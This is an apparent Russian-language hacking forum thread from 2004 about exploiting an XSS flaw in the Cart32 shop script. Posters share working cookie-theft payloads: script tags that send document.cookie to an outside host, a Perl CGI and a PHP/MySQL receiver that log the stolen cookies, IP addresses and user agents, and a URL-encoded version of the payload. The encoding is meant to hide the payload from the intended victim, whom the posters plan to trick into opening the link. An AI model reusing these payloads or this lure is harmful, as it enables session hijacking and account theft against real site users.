как реальзовать данную уязвимость шопа scripts/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script> для получения полезного
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (PUMA @ сентября 15 2004,15:46)</td></tr><tr><td id="QUOTE">scripts/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS'</script>[/QUOTE]<span id='postcolor'> По-моему от таких уязвимостей толку - ноль... Этот скрипт срабатывает только у того, кто отправил данный запрос... Какой в этом смысл ?
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (PUMA @ сентября 16 2004,20:52)</td></tr><tr><td id="QUOTE">стукните кто разбирается баг нераспространённый не хочу чтоб в массы вышел...[/QUOTE]<span id='postcolor'> Да))) Баг действительно нераспространенный) Скажу больше, это даже не баг фактически. Скрывай его дальше Потом продашь кому-нибудь. Ну а если по существу, можно конечно найти этому применение, только вероятность совсем невелика. Тем более, чтобы найти уязвимость, нужно хотя бы сами куки для начала посмотреть, и личный кабинет юзера, поэтому и спрашивал полный УРЛ
ну вот можно купить чтонибудь /// а вот ещё один ктонибудь сможет реализовать ? VP-ASP 'shoprestoreorder.asp' May Let Remote Users Keep Database Connections Open A denial of service vulnerability was reported in VP-ASP. A remote user can consume database resources on the target system. The vendor reported that a remote user can restore a previous order using 'shoprestoreorder.asp' to potentially cause a database connection to stay open. The vendor indicates that this can cause performance issues. Impact: A remote user may be able to cause database connections to stay open. Solution: The vendor has described a fix for 'shoprestoreorder.asp':
А если по-думать головой? <script>document.location.href='http://target.com/cgi-bin/cookie.cgi?' + document.cookie;</script> (cookie.cgi) #!/usr/bin/perl -w open COOKIES,">>../cookies.txt"; print "Content-Type: text/html\n\n"; print COOKIES "----------- new cookie -----------\n"; print COOKIES "$ENV{'QUERY_STRING'}\n"; print COOKIES "---------- end of cookie ---------\n\n"; close COOKIES;
acidhack, это примитивный вариант скрипта снифера ... Лучше использовать наш ... Да и не факт, что кукисы будут полезны ...
О! круто! Я догнал!!! А можно сделать так? www.xxx.ru/?search=<script>document.images[0].src='http://www.yyy.ru/?с'+document.cookie;</script> А в http://www.yyy.ru/ написать что-то типа PHP: <? $u_ip=htmlspecialchars(getenv("REMOTE_ADDR"), ENT_QUOTES); $u_agent=htmlspecialchars(getenv("HTTP_USER_AGENT"), ENT_QUOTES); $u_ref=htmlspecialchars(getenv("HTTP_REFERER"), ENT_QUOTES); $u_cookie=htmlspecialchars($c, ENT_QUOTES); mysql_unbuffered_query("INSERT INTO table VALUES('', '$u_ip', '$u_agent', '$u_ref', '$u_cookie')") or die(); header("Content-type: image/png"); $im=imagecreate(100, 100); $bgcolor=imagecolorallocate($im, 255, 255, 255); $tcolor=imagecolorallocate($im, 233, 14, 91); imagestring($im, 1, 5, 5, "Hackered", $tcolor); imagepng($im); imagedestroy($im); ?> Кинуть ламаку, типа на, погляди, я сайт ломанул, по идее его кука с этого сайта мне в БД, а он вместо первой картини сайта видит имагу 100 на 100 с надписью "Hackered", круто! Но есть одно но. Если он не такой и ламак, то перед тем как вставит код в браузер, проглядит его. Думаю его смутит строчка http://www.yyy.ru/?с'+document.cookie... Что тогда делать? Ыдь у нас java-inj, помойму можно как-то зашифровать весь скрипт, типа чтоб нельзя бло увидеть код скрипта, чтоб были одни кракозяборы... Круто!!! Блин помогите, будет ли ваще все это вашенаписанное работать, и если да, то как зашифровать строку? Ребят, респект =)
Code: xxx.ru/?search=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%69%6D%61%67%65%73%5B%30%5D%2E%73%72%63%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%79%79%79%2E%72%75%2F%3F%F1%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E (без пробелов - их форум автоматически вставляет)